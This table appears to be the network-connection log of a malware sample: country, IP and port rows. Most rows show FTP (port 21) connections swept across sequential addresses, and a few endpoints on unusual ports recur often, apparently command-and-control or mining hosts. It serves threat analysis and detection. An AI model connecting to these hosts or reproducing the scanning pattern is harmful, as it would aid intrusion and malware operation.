| CN | 183.244.135.14:21 | tcp | |
| GB | 51.251.248.14:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 154.27.55.14:21 | tcp | |
| AT | 45.158.34.14:21 | tcp | |
| US | 32.157.70.14:21 | tcp | |
| JP | 126.115.104.14:21 | tcp | |
| US | 204.204.85.14:21 | tcp | |
| CN | 218.107.36.14:21 | tcp | |
| JP | 219.5.129.14:21 | tcp | |
| RU | 185.215.113.67:40960 | tcp | |
| RO | 92.83.141.14:21 | tcp | |
| US | 64.78.87.14:21 | tcp | |
| US | 153.10.56.14:21 | tcp | |
| CH | 57.23.118.14:21 | tcp | |
| CN | 123.172.27.14:21 | tcp | |
| US | 8.245.219.14:21 | tcp | |
| TW | 59.113.94.14:21 | tcp | |
| NZ | 121.90.16.14:21 | tcp | |
| CN | 175.90.65.14:21 | tcp | |
| US | 164.189.42.14:21 | tcp | |
| US | 162.96.197.14:21 | tcp | |
| JP | 133.167.169.14:21 | tcp | |
| CA | 99.247.152.14:21 | tcp | |
| BR | 187.68.230.14:21 | tcp | |
| US | 73.48.85.14:21 | tcp | |
| AU | 164.80.98.14:21 | tcp | |
| CZ | 46.234.98.14:21 | tcp | |
| US | 30.168.201.14:21 | tcp | |
| CN | 58.253.5.14:21 | tcp | |
| NO | 78.91.232.14:21 | tcp | |
| JP | 60.69.53.14:21 | tcp | |
| SG | 4.146.166.14:21 | tcp | |
| US | 96.174.167.14:21 | tcp | |
| HK | 182.153.5.14:21 | tcp | |
| GB | 81.151.112.14:21 | tcp | |
| SA | 77.31.202.14:21 | tcp | |
| CA | 75.159.207.14:21 | tcp | |
| US | 214.52.110.14:21 | tcp | |
| CO | 181.147.248.14:21 | tcp | |
| US | 3.199.51.14:21 | tcp | |
| TW | 114.34.142.14:21 | tcp | |
| NL | 62.134.120.14:21 | tcp | |
| US | 6.106.219.14:21 | tcp | |
| PA | 186.74.25.14:21 | tcp | |
| US | 56.174.132.14:21 | tcp | |
| US | 158.224.15.14:21 | tcp | |
| DK | 195.249.133.14:21 | tcp | |
| TR | 46.155.227.14:21 | tcp | |
| CA | 216.191.134.14:21 | tcp | |
| US | 47.39.21.14:21 | tcp | |
| GB | 18.132.226.14:21 | tcp | |
| CN | 111.28.15.14:21 | tcp | |
| US | 16.20.184.14:21 | tcp | |
| US | 173.114.134.14:21 | tcp | |
| CN | 182.124.147.14:21 | tcp | |
| US | 199.177.143.14:21 | tcp | |
| ES | 90.94.0.14:21 | tcp | |
| EG | 45.102.51.14:21 | tcp | |
| GB | 82.24.184.14:21 | tcp | |
| KR | 218.50.90.14:21 | tcp | |
| AU | 103.8.134.14:21 | tcp | |
| AU | 120.159.217.14:21 | tcp | |
| AR | 179.42.183.14:21 | tcp | |
| US | 11.232.107.14:21 | tcp | |
| US | 131.24.32.14:21 | tcp | |
| US | 135.84.73.14:21 | tcp | |
| CA | 167.37.115.14:21 | tcp | |
| CN | 223.246.119.14:21 | tcp | |
| US | 75.48.126.14:21 | tcp | |
| UA | 5.58.140.14:21 | tcp | |
| US | 50.182.77.14:21 | tcp | |
| US | 66.34.12.14:21 | tcp | |
| US | 204.86.207.14:21 | tcp | |
| NL | 141.176.38.14:21 | tcp | |
| US | 146.49.58.14:21 | tcp | |
| FR | 79.80.237.14:21 | tcp | |
| CN | 36.179.250.14:21 | tcp | |
| IL | 95.35.193.14:21 | tcp | |
| CO | 152.203.80.14:21 | tcp | |
| DZ | 41.99.18.14:21 | tcp | |
| VN | 115.73.188.14:21 | tcp | |
| US | 104.185.51.14:21 | tcp | |
| US | 107.160.203.14:21 | tcp | |
| NO | 80.239.80.14:21 | tcp | |
| JP | 203.114.43.14:21 | tcp | |
| US | 184.16.187.14:21 | tcp | |
| US | 208.112.173.14:21 | tcp | |
| SG | 203.125.99.14:21 | tcp | |
| JP | 130.54.159.14:21 | tcp | |
| US | 99.110.206.14:21 | tcp | |
| US | 17.178.188.14:21 | tcp | |
| US | 139.43.25.14:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| HK | 103.59.103.198:80 | 103.59.103.198 | tcp |
| US | 20.83.148.22:80 | tcp | |
| IL | 195.60.232.6:100 | 195.60.232.6 | tcp |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.216.143.20:12695 | tcp | |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| US | 20.83.148.22:80 | tcp | |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| CN | 8.134.163.72:801 | tcp | |
| CN | 222.186.172.42:1000 | tcp | |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| RU | 185.215.113.117:3333 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| RU | 176.111.174.140:80 | 176.111.174.140 | tcp |
| US | 140.200.194.15:21 | tcp | |
| KR | 211.239.170.15:21 | tcp | |
| IT | 151.86.228.15:21 | tcp | |
| AU | 168.134.149.15:21 | tcp | |
| US | 40.0.200.15:21 | tcp | |
| KE | 196.207.157.15:21 | tcp | |
| US | 48.173.168.15:21 | tcp | |
| US | 104.179.198.15:21 | tcp | |
| RU | 176.111.174.140:1912 | tcp | |
| PL | 31.182.118.15:21 | tcp | |
| JP | 133.108.70.15:21 | tcp | |
| JP | 220.9.22.15:21 | tcp | |
| US | 205.165.199.15:21 | tcp | |
| GB | 90.254.76.15:21 | tcp | |
| US | 156.98.142.15:21 | tcp | |
| JP | 58.70.0.15:21 | tcp | |
| JP | 114.148.12.15:21 | tcp | |
| US | 184.76.1.15:21 | tcp | |
| JP | 118.14.89.15:21 | tcp | |
| US | 215.161.104.15:21 | tcp | |
| US | 141.190.101.15:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 63.246.161.15:21 | tcp | |
| CO | 181.236.215.15:21 | tcp | |
| JP | 221.184.70.15:21 | tcp | |
| US | 66.111.117.15:21 | tcp | |
| US | 52.159.31.15:21 | tcp | |
| US | 13.173.200.15:21 | tcp | |
| US | 162.116.187.15:21 | tcp | |
| BR | 152.252.113.15:21 | tcp | |
| US | 9.156.237.15:21 | tcp | |
| US | 74.149.184.15:21 | tcp | |
| CA | 66.49.134.15:21 | tcp | |
| GB | 62.64.254.15:21 | tcp | |
| US | 140.187.79.15:21 | tcp | |
| IE | 89.101.0.15:21 | tcp | |
| US | 65.136.238.15:21 | tcp | |
| US | 144.225.214.15:21 | tcp | |
| CN | 124.75.1.15:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 128.91.237.15:21 | tcp | |
| BR | 38.7.230.15:21 | tcp | |
| CL | 204.137.130.15:21 | tcp | |
| US | 56.192.94.15:21 | tcp | |
| CN | 175.66.240.15:21 | tcp | |
| AO | 105.173.46.15:21 | tcp | |
| US | 32.79.48.15:21 | tcp | |
| KR | 202.31.99.15:21 | tcp | |
| JP | 42.150.210.15:21 | tcp | |
| AU | 180.200.214.15:21 | tcp | |
| US | 97.89.153.15:21 | tcp | |
| US | 135.245.50.15:21 | tcp | |
| CN | 106.34.167.15:21 | tcp | |
| CA | 70.55.194.15:21 | tcp | |
| US | 67.242.46.15:21 | tcp | |
| HK | 154.26.201.15:21 | tcp | |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| US | 99.64.159.15:21 | tcp | |
| US | 69.168.118.15:21 | tcp | |
| FR | 86.201.9.15:21 | tcp | |
| NO | 139.109.46.15:21 | tcp | |
| US | 167.66.41.15:21 | tcp | |
| US | 55.114.69.15:21 | tcp | |
| US | 143.207.118.15:21 | tcp | |
| GB | 95.142.147.15:21 | tcp | |
| CO | 191.104.148.15:21 | tcp | |
| US | 216.90.116.15:21 | tcp | |
| US | 198.181.94.15:21 | tcp | |
| DE | 2.167.96.15:21 | tcp | |
| CN | 110.122.92.15:21 | tcp | |
| GB | 25.177.112.15:21 | tcp | |
| US | 216.143.236.15:21 | tcp | |
| TR | 176.236.93.15:21 | tcp | |
| US | 148.114.28.15:21 | tcp | |
| NI | 165.98.196.15:21 | tcp | |
| US | 135.99.171.15:21 | tcp | |
| NO | 188.113.118.15:21 | tcp | |
| MY | 219.92.110.15:21 | tcp | |
| US | 23.21.52.15:21 | tcp | |
| US | 19.206.56.15:21 | tcp | |
| US | 129.201.218.15:21 | tcp | |
| US | 152.82.244.15:21 | tcp | |
| FR | 62.106.145.15:21 | tcp | |
| US | 147.38.148.15:21 | tcp | |
| US | 150.194.142.15:21 | tcp | |
| CO | 167.0.47.15:21 | tcp | |
| US | 44.153.187.15:21 | tcp | |
| US | 107.45.80.15:21 | tcp | |
| US | 207.206.162.15:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 31.214.157.226:80 | 31.214.157.226 | tcp |
| US | 20.83.148.22:80 | tcp | |
| NL | 89.105.201.183:2023 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 89.105.201.183:2023 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 55.167.247.16:21 | tcp | |
| FR | 83.196.85.16:21 | tcp | |
| US | 65.244.80.16:21 | tcp | |
| MX | 148.235.31.16:21 | tcp | |
| IR | 89.198.53.16:21 | tcp | |
| US | 9.216.187.16:21 | tcp | |
| US | 166.158.19.16:21 | tcp | |
| CO | 191.156.88.16:21 | tcp | |
| US | 34.135.47.16:21 | tcp | |
| BR | 179.157.174.16:21 | tcp | |
| TH | 134.196.125.16:21 | tcp | |
| AU | 158.45.125.16:21 | tcp | |
| BG | 89.252.215.16:21 | tcp | |
| US | 215.255.80.16:21 | tcp | |
| US | 15.140.20.16:21 | tcp | |
| CN | 182.131.148.16:21 | tcp | |
| US | 199.190.63.16:21 | tcp | |
| AU | 143.238.14.16:21 | tcp | |
| US | 209.61.202.16:21 | tcp | |
| CA | 24.68.181.16:21 | tcp | |
| CN | 223.83.26.16:21 | tcp | |
| JP | 52.140.207.16:21 | tcp | |
| CN | 124.73.235.16:21 | tcp | |
| JP | 219.187.175.16:21 | tcp | |
| JP | 219.206.79.16:21 | tcp | |
| US | 75.177.163.16:21 | tcp | |
| US | 166.134.108.16:21 | tcp | |
| MA | 105.130.185.16:21 | tcp | |
| IL | 89.138.56.16:21 | tcp | |
| US | 3.88.133.16:21 | tcp | |
| US | 174.170.158.16:21 | tcp | |
| US | 21.227.246.16:21 | tcp | |
| US | 74.133.118.16:21 | tcp | |
| US | 144.83.226.16:21 | tcp | |
| CN | 60.219.86.16:21 | tcp | |
| KR | 61.252.119.16:21 | tcp | |
| KR | 221.145.18.16:21 | tcp | |
| CN | 113.72.56.16:21 | tcp | |
| US | 12.74.101.16:21 | tcp | |
| DK | 83.90.213.16:21 | tcp | |
| TR | 88.253.151.16:21 | tcp | |
| US | 152.44.161.16:21 | tcp | |
| AR | 186.140.110.16:21 | tcp | |
| US | 24.236.58.16:21 | tcp | |
| US | 11.233.189.16:21 | tcp | |
| TW | 210.62.189.16:21 | tcp | |
| KE | 196.100.123.16:21 | tcp | |
| CN | 182.139.121.16:21 | tcp | |
| US | 73.76.212.16:21 | tcp | |
| US | 23.140.205.16:21 | tcp | |
| US | 166.123.181.16:21 | tcp | |
| US | 73.65.187.16:21 | tcp | |
| JP | 27.91.171.16:21 | tcp | |
| US | 99.8.199.16:21 | tcp | |
| US | 215.140.107.16:21 | tcp | |
| JP | 125.194.54.16:21 | tcp | |
| IE | 144.2.50.16:21 | tcp | |
| PY | 186.182.83.16:21 | tcp | |
| AU | 160.25.37.16:21 | tcp | |
| SG | 43.40.108.16:21 | tcp | |
| CA | 137.186.12.16:21 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| CN | 36.0.13.16:21 | tcp | |
| AU | 172.196.186.16:21 | tcp | |
| JP | 111.90.48.16:21 | tcp | |
| GB | 62.190.109.16:21 | tcp | |
| US | 13.78.164.16:21 | tcp | |
| US | 131.85.122.16:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| TR | 95.14.178.16:21 | tcp | |
| US | 76.214.53.16:21 | tcp | |
| JP | 113.150.1.16:21 | tcp | |
| US | 192.185.76.16:21 | tcp | |
| US | 22.117.243.16:21 | tcp | |
| US | 129.116.168.16:21 | tcp | |
| US | 3.194.105.16:21 | tcp | |
| BR | 177.94.252.16:21 | tcp | |
| CA | 70.29.14.16:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 38.81.221.16:21 | tcp | |
| US | 12.90.255.16:21 | tcp | |
| BR | 187.88.132.16:21 | tcp | |
| US | 35.98.202.16:21 | tcp | |
| FR | 78.238.176.16:21 | tcp | |
| CN | 118.80.9.16:21 | tcp | |
| US | 40.152.176.16:21 | tcp | |
| US | 149.47.4.16:21 | tcp | |
| US | 108.60.212.16:21 | tcp | |
| DE | 164.133.151.16:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:40960 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 89.105.201.183:2023 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.216.143.20:12695 | tcp | |
| DE | 136.243.76.21:445 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 222.186.172.42:1000 | tcp | |
| DE | 136.243.76.21:139 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| VE | 190.39.143.17:21 | tcp | |
| CN | 175.67.69.17:21 | tcp | |
| KR | 59.29.69.17:21 | tcp | |
| EG | 154.141.29.17:21 | tcp | |
| HK | 103.196.49.17:21 | tcp | |
| JP | 221.241.16.17:21 | tcp | |
| DE | 53.18.180.17:21 | tcp | |
| US | 167.248.150.17:21 | tcp | |
| JP | 61.201.233.17:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 131.39.88.17:21 | tcp | |
| US | 100.204.238.17:21 | tcp | |
| JP | 202.34.235.17:21 | tcp | |
| RU | 92.37.151.17:21 | tcp | |
| JP | 222.224.157.17:21 | tcp | |
| US | 169.121.227.17:21 | tcp | |
| TW | 140.122.180.17:21 | tcp | |
| US | 146.129.188.17:21 | tcp | |
| AE | 3.28.225.17:21 | tcp | |
| CN | 221.198.113.17:21 | tcp | |
| TW | 210.240.160.17:21 | tcp | |
| US | 11.135.194.17:21 | tcp | |
| US | 167.254.17.17:21 | tcp | |
| PL | 62.229.52.17:21 | tcp | |
| US | 74.152.127.17:21 | tcp | |
| TH | 58.137.172.17:21 | tcp | |
| CN | 1.90.210.17:21 | tcp | |
| CN | 14.125.241.17:21 | tcp | |
| UA | 62.84.251.17:21 | tcp | |
| GB | 161.76.254.17:21 | tcp | |
| US | 206.161.252.17:21 | tcp | |
| RU | 85.202.226.17:21 | tcp | |
| GT | 190.62.161.17:21 | tcp | |
| US | 206.239.32.17:21 | tcp | |
| US | 208.31.168.17:21 | tcp | |
| US | 64.241.27.17:21 | tcp | |
| US | 199.174.205.17:21 | tcp | |
| KR | 1.109.11.17:21 | tcp | |
| CH | 57.17.7.17:21 | tcp | |
| KR | 175.233.80.17:21 | tcp | |
| US | 208.240.158.17:21 | tcp | |
| ID | 23.217.16.17:21 | tcp | |
| US | 143.175.36.17:21 | tcp | |
| US | 184.187.122.17:21 | tcp | |
| TR | 176.216.57.17:21 | tcp | |
| US | 169.189.165.17:21 | tcp | |
| US | 22.255.6.17:21 | tcp | |
| US | 63.224.63.17:21 | tcp | |
| US | 7.198.131.17:21 | tcp | |
| SE | 84.219.46.17:21 | tcp | |
| US | 174.255.124.17:21 | tcp | |
| RU | 185.215.113.117:3333 | tcp | |
| US | 8.45.149.17:21 | tcp | |
| IN | 117.211.37.17:21 | tcp | |
| GB | 86.6.68.17:21 | tcp | |
| US | 34.134.10.17:21 | tcp | |
| US | 30.160.189.17:21 | tcp | |
| US | 71.214.61.17:21 | tcp | |
| CN | 124.165.214.17:21 | tcp | |
| US | 169.56.142.17:21 | tcp | |
| CL | 190.208.154.17:21 | tcp | |
| GB | 130.88.127.17:21 | tcp | |
| US | 76.196.224.17:21 | tcp | |
| HK | 202.77.41.17:21 | tcp | |
| US | 19.113.11.17:21 | tcp | |
| US | 107.72.134.17:21 | tcp | |
| ID | 39.195.188.17:21 | tcp | |
| RO | 94.131.119.184:443 | tcp | |
| CN | 112.62.61.17:21 | tcp | |
| FR | 78.245.28.17:21 | tcp | |
| CA | 142.92.31.17:21 | tcp | |
| US | 159.161.255.17:21 | tcp | |
| US | 15.18.57.17:21 | tcp | |
| US | 24.90.147.17:21 | tcp | |
| CN | 39.78.154.17:21 | tcp | |
| US | 56.26.219.17:21 | tcp | |
| US | 12.183.242.17:21 | tcp | |
| UA | 134.249.32.17:21 | tcp | |
| US | 174.202.8.17:21 | tcp | |
| US | 21.131.32.17:21 | tcp | |
| CN | 14.26.93.17:21 | tcp | |
| DE | 195.127.214.17:21 | tcp | |
| GR | 147.52.29.17:21 | tcp | |
| US | 157.246.162.17:21 | tcp | |
| BR | 179.111.184.17:21 | tcp | |
| US | 4.124.47.17:21 | tcp | |
| US | 208.233.83.17:21 | tcp | |
| NL | 145.200.214.17:21 | tcp | |
| TR | 88.245.88.17:21 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RO | 94.131.119.184:443 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 220.199.213.18:21 | tcp | |
| BG | 31.13.204.18:21 | tcp | |
| US | 104.69.60.18:21 | tcp | |
| BR | 177.48.60.18:21 | tcp | |
| GB | 51.219.121.18:21 | tcp | |
| US | 199.116.74.18:21 | tcp | |
| IN | 111.93.52.18:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CW | 190.2.176.18:21 | tcp | |
| IN | 163.47.208.18:21 | tcp | |
| IR | 2.146.185.18:21 | tcp | |
| CN | 58.20.69.18:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| KR | 59.30.52.18:21 | tcp | |
| VN | 171.249.172.18:21 | tcp | |
| US | 204.154.110.18:21 | tcp | |
| SE | 194.198.2.18:21 | tcp | |
| US | 26.156.233.18:21 | tcp | |
| JP | 150.3.9.18:21 | tcp | |
| CN | 183.16.188.18:21 | tcp | |
| RU | 37.144.38.18:21 | tcp | |
| CN | 111.197.216.18:21 | tcp | |
| SE | 81.232.83.18:21 | tcp | |
| SA | 188.53.113.18:21 | tcp | |
| US | 214.91.9.18:21 | tcp | |
| US | 162.39.122.18:21 | tcp | |
| JP | 218.216.170.18:21 | tcp | |
| US | 64.244.139.18:21 | tcp | |
| US | 160.108.146.18:21 | tcp | |
| GB | 79.123.109.18:21 | tcp | |
| MY | 183.171.224.18:21 | tcp | |
| JP | 163.139.106.18:21 | tcp | |
| CH | 178.197.49.18:21 | tcp | |
| CN | 182.126.90.18:21 | tcp | |
| FI | 195.148.178.18:21 | tcp | |
| JP | 220.97.75.18:21 | tcp | |
| DE | 82.212.13.18:21 | tcp | |
| VN | 171.235.18.18:21 | tcp | |
| JP | 133.148.190.18:21 | tcp | |
| IR | 5.211.0.18:21 | tcp | |
| CN | 110.122.69.18:21 | tcp | |
| RO | 94.131.119.184:443 | tcp | |
| US | 55.130.173.18:21 | tcp | |
| CN | 58.62.147.18:21 | tcp | |
| US | 48.210.177.18:21 | tcp | |
| US | 24.23.185.18:21 | tcp | |
| US | 162.189.17.18:21 | tcp | |
| CN | 202.127.157.18:21 | tcp | |
| CN | 49.94.119.18:21 | tcp | |
| US | 30.252.201.18:21 | tcp | |
| US | 6.14.13.18:21 | tcp | |
| GB | 62.190.184.18:21 | tcp | |
| CN | 116.196.200.18:21 | tcp | |
| IT | 151.30.93.18:21 | tcp | |
| SG | 68.178.226.18:21 | tcp | |
| DE | 194.174.238.18:21 | tcp | |
| PA | 201.224.193.18:21 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| US | 67.250.99.18:21 | tcp | |
| CL | 186.40.17.18:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 108.141.167.18:21 | tcp | |
| CN | 175.57.103.18:21 | tcp | |
| DE | 78.52.127.18:21 | tcp | |
| US | 185.208.158.202:80 | bertbhz.com | tcp |
| MX | 201.130.102.18:21 | tcp | |
| US | 21.58.76.18:21 | tcp | |
| IT | 157.29.237.18:21 | tcp | |
| US | 170.209.156.18:21 | tcp | |
| JP | 106.161.92.18:21 | tcp | |
| US | 215.124.205.18:21 | tcp | |
| JP | 202.255.203.18:21 | tcp | |
| EG | 196.144.72.18:21 | tcp | |
| US | 170.141.77.18:21 | tcp | |
| SG | 43.49.164.18:21 | tcp | |
| MX | 187.244.57.18:21 | tcp | |
| US | 129.89.53.18:21 | tcp | |
| RU | 95.26.194.18:21 | tcp | |
| CN | 125.108.57.18:21 | tcp | |
| DE | 93.104.100.18:21 | tcp | |
| PL | 46.187.131.18:21 | tcp | |
| US | 130.94.112.18:21 | tcp | |
| KR | 118.222.62.18:21 | tcp | |
| US | 159.150.25.18:21 | tcp | |
| CA | 142.112.235.18:21 | tcp | |
| US | 67.240.138.18:21 | tcp | |
| PL | 37.249.250.18:21 | tcp | |
| HK | 103.221.41.18:21 | tcp | |
| GB | 194.227.36.18:21 | tcp | |
| BR | 179.103.208.18:21 | tcp | |
| KR | 203.234.196.18:21 | tcp | |
| US | 73.225.38.18:21 | tcp | |
| IN | 103.38.219.18:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:40960 | tcp | |
| CN | 222.186.172.42:1000 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.216.143.20:12695 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RO | 94.131.119.184:443 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 147.124.222.241:47056 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 18.192.94.19:21 | tcp | |
| BR | 200.220.251.19:21 | tcp | |
| CN | 115.33.99.19:21 | tcp | |
| BR | 179.227.230.19:21 | tcp | |
| KR | 49.58.2.19:21 | tcp | |
| US | 6.0.0.19:21 | tcp | |
| US | 169.8.20.19:21 | tcp | |
| US | 152.31.64.19:21 | tcp | |
| US | 215.223.69.19:21 | tcp | |
| US | 8.33.201.19:21 | tcp | |
| BG | 95.43.48.19:21 | tcp | |
| CN | 114.99.75.19:21 | tcp | |
| FR | 161.105.86.19:21 | tcp | |
| SG | 180.129.112.19:21 | tcp | |
| JP | 210.230.181.19:21 | tcp | |
| BR | 200.99.126.19:21 | tcp | |
| US | 29.214.167.19:21 | tcp | |
| CN | 61.188.215.19:21 | tcp | |
| CA | 149.56.207.19:21 | tcp | |
| IT | 85.46.214.19:21 | tcp | |
| CN | 113.224.100.19:21 | tcp | |
| US | 28.217.252.19:21 | tcp | |
| US | 32.210.111.19:21 | tcp | |
| VN | 123.20.150.19:21 | tcp | |
| HK | 165.43.18.19:21 | tcp | |
| US | 168.100.4.19:21 | tcp | |
| KR | 175.121.110.19:21 | tcp | |
| US | 72.100.194.19:21 | tcp | |
| IN | 157.32.86.19:21 | tcp | |
| US | 97.155.222.19:21 | tcp | |
| US | 3.224.137.19:21 | tcp | |
| US | 71.155.132.19:21 | tcp | |
| IN | 101.222.1.19:21 | tcp | |
| RU | 178.213.18.19:21 | tcp | |
| FI | 84.34.127.19:21 | tcp | |
| US | 107.87.252.19:21 | tcp | |
| KR | 42.33.250.19:21 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| BR | 179.126.130.19:21 | tcp | |
| US | 24.193.116.19:21 | tcp | |
| N/A | 10.26.131.19:21 | tcp | |
| AU | 3.105.61.19:21 | tcp | |
| US | 98.111.129.19:21 | tcp | |
| JP | 163.148.130.19:21 | tcp | |
| JP | 153.234.182.19:21 | tcp | |
| QA | 20.173.163.19:21 | tcp | |
| CN | 39.175.71.19:21 | tcp | |
| CL | 179.56.245.19:21 | tcp | |
| JP | 106.168.211.19:21 | tcp | |
| US | 32.220.208.19:21 | tcp | |
| CA | 66.170.182.19:21 | tcp | |
| US | 138.175.10.19:21 | tcp | |
| US | 126.243.104.19:21 | tcp | |
| IN | 220.224.65.19:21 | tcp | |
| US | 57.127.184.19:21 | tcp | |
| US | 199.242.169.19:21 | tcp | |
| US | 72.26.39.19:21 | tcp | |
| US | 40.95.218.19:21 | tcp | |
| US | 55.59.229.19:21 | tcp | |
| JP | 157.11.209.19:21 | tcp | |
| US | 155.35.236.19:21 | tcp | |
| CN | 120.195.193.19:21 | tcp | |
| US | 12.117.44.19:21 | tcp | |
| ES | 80.25.208.19:21 | tcp | |
| US | 11.249.69.19:21 | tcp | |
| CN | 110.83.53.19:21 | tcp | |
| CA | 161.187.168.19:21 | tcp | |
| TM | 91.202.233.158:80 | 91.202.233.158 | tcp |
| US | 40.30.194.19:21 | tcp | |
| US | 97.68.107.19:21 | tcp | |
| IT | 81.122.188.19:21 | tcp | |
| KN | 209.59.69.19:21 | tcp | |
| US | 136.251.35.19:21 | tcp | |
| AU | 14.201.17.19:21 | tcp | |
| NO | 212.251.176.19:21 | tcp | |
| AR | 201.254.48.19:21 | tcp | |
| US | 51.111.124.19:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| JP | 124.141.75.19:21 | tcp | |
| GB | 80.6.131.19:21 | tcp | |
| NL | 86.95.252.19:21 | tcp | |
| US | 108.69.196.19:21 | tcp | |
| BH | 57.88.46.19:21 | tcp | |
| SA | 100.225.120.19:21 | tcp | |
| RU | 185.215.113.117:3333 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 20.83.148.22:80 | tcp | |
| RO | 94.131.119.184:443 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| RU | 185.215.113.17:80 | 185.215.113.17 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AE | 62.60.236.215:3210 | tcp | |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
